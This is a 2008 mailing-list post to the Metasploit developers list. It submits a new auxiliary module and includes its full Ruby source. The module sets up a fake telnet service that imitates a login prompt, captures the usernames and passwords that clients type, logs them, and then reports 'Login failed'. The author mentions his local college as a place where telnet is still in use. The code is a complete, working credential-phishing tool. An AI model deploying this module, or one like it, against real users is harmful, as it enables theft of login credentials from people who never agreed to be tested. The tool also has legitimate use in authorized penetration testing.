-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hey everyone,
I've attached a new auxiliary module: server/capture/telnet. In the same fashion as the other server/capture modules, this creates a fake telnet service to capture authentication credentials. Far too many people still use Telnet, my local college being a prime example of this. At the beginning, the server sends DONT/WONT responses to the client's WILL/WONT and DO/DONT option negotiations. Then the server sends "Welcome" and presents a prompt for the username. After the username is obtained, WILL ECHO is then sent for more realism (no password echoing on the client's end). After all of the credentials are captured, it sends "Login failed" and closes the connection. msf > info server/capture/telnet Name: Authentication Capture: Telnet Version: 1 Provided by: Kris Katterjohn <[EMAIL PROTECTED]> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 23 yes The local port to listen on. SSL false no Use SSL Description: This module provides a fake Telnet service that is designed to capture authentication credentials. DONTs and WONTs are sent to the client for all option negotiations, except for ECHO at the time of the password prompt since the server controls that for a bit more realism. And a little example output: [*] TELNET LOGIN 192.168.10.6:60227 myusername / mypassword [*] TELNET LOGIN 192.168.10.6:60228 myusername2 / mypassword2 Thanks, Kris Katterjohn -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQIVAwUBSN/M6v9K37xXYl36AQJbxQ/+KPTTW83VXqMW5vmEHCJxzHTTkl1nh87r 8Tbc778A9ZsD2Y8NnUOqhX8x52q2M/Eaqx+Ez5zipgGFqww8o6LsiLuIx/nx/O9V SROfr+tWTFQUyB+usQX4cc4eJD5PlXf4Twqyja1LQvJTR5emkK+4YolaC80NXTBa Mg9QAe+sXJm6oO3gkAKna1eYY9r9pG122zMYm2IoNRgA/V8Vjo65ZwBDhGHGZDaJ xJd+TfFRH11TaPE2YAmNd38G6YBSzP4onLZqP8wztZ6fs2HcaYCl7Oh9+E0RjaAm a4QrBIhQvTepfC7F4JGbcD5l8eSiiDEbhnmetHR25VRn0zBXO2SGoyge4eYdDJtH sacEOAA7+l7G9986WkmRdpZmUi7sLO+p/MsCXbzZAbrp5EheQRGlqYkYVvMr56Se OeWNbTLd0jNqgVFcPx+Lx6Lw0YW6W6EvaeujM/glPxFwKM8WP+RY5GbJoh2A+hyW JFG/ifVYH7DapbegHHjR/IPBWO6rHMJEhLmuVakHyjtGM1PF0vup6sYO0pisikor V4jiZgHp/WjkG6IW45I7MitPGYamJk8HTmDwqVjt1gJhZQjrfQQP1AMPl4YYlHw+ hi04Y2gx4PPWQDMf0k0AKQlSnfVkTVyz8MNuzTqcE914G08eDXdoR8Yf1PfXBDTf 74JejZneINs= =f+M5 -----END PGP SIGNATURE-----
require 'msf/core' module Msf # Fake Telnet Service - Kris Katterjohn 09/28/2008 class Auxiliary::Server::Capture::Telnet < Msf::Auxiliary include Exploit::Remote::TcpServer include Auxiliary::Report def initialize super( 'Name' => 'Authentication Capture: Telnet', 'Version' => '1', 'Description' => %q{ This module provides a fake Telnet service that is designed to capture authentication credentials. DONTs and WONTs are sent to the client for all option negotiations, except for ECHO at the time of the password prompt since the server controls that for a bit more realism. }, 'Author' => 'Kris Katterjohn <[EMAIL PROTECTED]>', 'License' => MSF_LICENSE, 'Actions' => [ [ 'Capture' ] ], 'PassiveActions' => [ 'Capture' ], 'DefaultAction' => 'Capture' ) register_options( [ OptPort.new('SRVPORT', [ true, "The local port to listen on.", 23 ]) ], self.class) end def setup super @state = {} end def run exploit() end def on_client_connect(c) @state[c] = { :name => "#{c.peerhost}:#{c.peerport}", :ip => c.peerhost, :port => c.peerport, :user => nil, :pass => nil, :gotuser => false, :gotpass => false, :started => false } end def on_client_data(c) data = c.get_once return if not data offset = 0 if data[0] == 0xff 0.step(data.size, 3) do |x| break if data[x] != 0xff # Answer DONT/WONT for WILL/WONTs and DO/DONTs, # except for echoing which we WILL control for # the password reply = "\xffX#{data[x + 2].chr}" if @state[c][:pass] and data[x + 2] == 0x01 reply[1] = "\xfb" elsif data[x + 1] == 0xfb or data[x + 1] == 0xfc reply[1] = "\xfe" elsif data[x + 1] == 0xfd or data[x + 1] == 0xfe reply[1] = "\xfc" end c.put reply offset += 3 end end if not @state[c][:started] c.put "\r\nWelcome.\r\n\r\n" @state[c][:started] = true end if @state[c][:user].nil? c.put "\x01" c.put "\x00Login: " @state[c][:user] = "" return end return if offset >= data.size data = data[offset, data.size] if not @state[c][:gotuser] @state[c][:user] = data.strip @state[c][:gotuser] = true c.put "\xff\xfb\x01" # WILL ECHO end if @state[c][:pass].nil? c.put "\x01" c.put "\x00Password: " @state[c][:pass] = "" return end if not @state[c][:gotpass] @state[c][:pass] = data.strip @state[c][:gotpass] = true c.put "\x00\r\n" end report_auth_info( :host => @state[c][:ip], :proto => 'telnet', :targ_host => datastore['SRVHOST'], :targ_port => datastore['SRVPORT'], :user => @state[c][:user], :pass => @state[c][:pass] ) print_status("TELNET LOGIN [EMAIL PROTECTED]:name]} [EMAIL PROTECTED]:user]} / [EMAIL PROTECTED]:pass]}") c.put "\r\nLogin failed\r\n\r\n" c.close end def on_client_close(c) @state.delete(c) end end end
_______________________________________________ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers